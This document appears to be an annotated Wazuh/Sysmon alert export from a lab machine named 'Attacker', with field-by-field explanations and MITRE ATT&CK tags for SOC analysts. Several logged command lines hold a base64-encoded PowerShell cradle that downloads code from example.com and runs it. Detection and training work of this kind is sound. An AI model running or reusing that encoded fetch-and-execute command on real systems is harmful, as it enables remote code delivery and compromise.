data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcdc-680a-d60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8684
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:01.037+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:01.037+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534221.1129062
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:15.9842219Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282678
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:15.968 ProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00} ProcessId: 11988 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_blnnlgfs.rwq.ps1 CreationUtcTime: 2025-04-24 22:36:15.968 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:15.968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcde-680a-d90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_blnnlgfs.rwq.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:15.968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:01.563+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:01.563+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534221.1131831
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:19.7512986Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282717
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:17.032 ProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00} ProcessId: 12012 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcde-680a-d90a-000000000e00} ParentProcessId: 11988 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:17.032
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce1-680a-dc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcde-680a-d90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:01.579+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:01.579+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534221.1139902
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:19.9724799Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282718
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:19.900 ProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00} ProcessId: 12012 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_igv42wmh.ctb.ps1 CreationUtcTime: 2025-04-24 22:36:19.900 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:19.900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce1-680a-dc0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_igv42wmh.ctb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:19.900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.071+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.071+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1142671
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:22.1640650Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282752
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:21.060 ProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00} ProcessId: 10556 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00} ParentProcessId: 12012 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:21.060
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce5-680a-df0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10556
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

